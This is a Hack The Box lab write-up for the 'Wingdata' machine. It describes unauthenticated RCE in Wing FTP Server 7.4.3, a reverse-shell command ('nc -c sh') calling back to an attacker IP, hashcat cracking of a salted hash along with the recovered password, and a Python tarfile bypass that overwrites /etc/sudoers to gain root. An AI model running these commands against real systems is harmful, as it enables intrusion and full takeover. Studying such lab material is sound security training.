← ./writeups

Hack The Box

Wingdata

HTBEasyLinuxWebRCEPrivEsc

Summary

Wingdata is an Easy Linux machine running Wing FTP Server v7.4.3, vulnerable to an unauthenticated RCE (CVE-2025-47812) that yields a shell as wingftp. Local user XML files expose a salted SHA-256 hash that is cracked (custom salt WingFTP) for SSH access as wacky. A sudo-allowed backup script using Python's tarfile is exploited via a tar extraction bypass (CVE-2025-4517) to overwrite /etc/sudoers and escalate to root.

Machine Information

NameDifficultyOSPlatform
WingdataEasyLinuxHack The Box

Attack Path

  1. Initial enumeration with Nmap.
  2. Identify Wing FTP Server v7.4.3.
  3. Exploit unauthenticated RCE (CVE-2025-47812).
  4. Initial shell as wingftp.
  5. Local enumeration and credential collection.
  6. Crack a salted hash (custom salt).
  7. SSH access as wacky.
  8. sudo enumeration.
  9. Exploit the Python tarfile bypass (CVE-2025-4517).
  10. Obtain root.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A 10.129.29.71

Nmap Scan

Two ports were open: 22 (SSH) for later access and 80 (HTTP) as the main attack vector.

Web Enumeration

The web application was a corporate site for "Wing Data Solutions". Browsing revealed the Wing FTP Server Web Client, which disclosed the version:

Web page

Wing FTP Server v7.4.3

Wing FTP

The exact version made it possible to search for version-specific vulnerabilities.

Exploitation — Wing FTP RCE (CVE-2025-47812)

Wing FTP Server v7.4.3 is vulnerable to unauthenticated RCE via manipulation of the username parameter on the login endpoint.

Exploit DB

A public Python exploit was used, first validating execution with whoami:

python3 exploit.py -u http://ftp.wingdata.htb -v

whoami

Then to obtain a reverse shell:

python3 exploit.py -u http://ftp.wingdata.htb -v -c "nc -c sh 10.10.14.233 1337"

Exploit

Initial Access

A listener was prepared on the attacker machine, and the exploit returned a shell as the wingftp service user.

nc -nvlp 1337

Reverse shell

Privilege Escalation

Credential collection

Local enumeration found user XML files containing password hashes:

/opt/wftpserver/Data/1/users/

wacky.xml exposed a hash:

Hash

32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca

Cracking the salted hash

Plain SHA-256 failed; the system used the fixed salt WingFTP. Hashcat cracked it with the salted SHA-256 mode:

hashcat -m 1410 hash.txt /usr/share/wordlists/rockyou.txt

Hashcat

!#7Blushing^*Bride5

These credentials were reused for a stable SSH session as wacky:

ssh wacky@ftp.wingdata.htb

SSH

tarfile bypass (CVE-2025-4517)

sudo -l showed wacky could run a backup script as root:

/usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *

The script extracted archives with tar.extractall(path=staging_dir, filter="data"). That filter is not fully safe and is bypassable via CVE-2025-4517 using a symlink/hardlink combination, allowing arbitrary writes as root.

CVE

A PoC was used to craft a malicious .tar that escapes the directory and overwrites /etc/sudoers, granting wacky full sudo:

python3 /tmp/CVE-2025-4517-POC.py

Privilege escalation

wacky ALL=(ALL) NOPASSWD: ALL

A root shell was then trivial:

sudo /bin/bash

Flags

User

cat /home/wacky/user.txt

User flag

621bc7d792d7ae33963b5dc2d2a2216

Root

cat /root/root.txt

Root flag

10249185de33be92fb5d2ed29f74a025

Vulnerabilities Identified

Wing FTP RCE (CVE-2025-47812)

Impact: initial foothold as the wingftp service user.

Exposed Credentials

Impact: offline credential recovery and SSH access.

Python tarfile Bypass (CVE-2025-4517)

Impact: arbitrary file write as root and full privilege escalation.

Insecure sudo Script

Impact: enabled the tarfile bypass to reach root.

Tools Used

Key Takeaways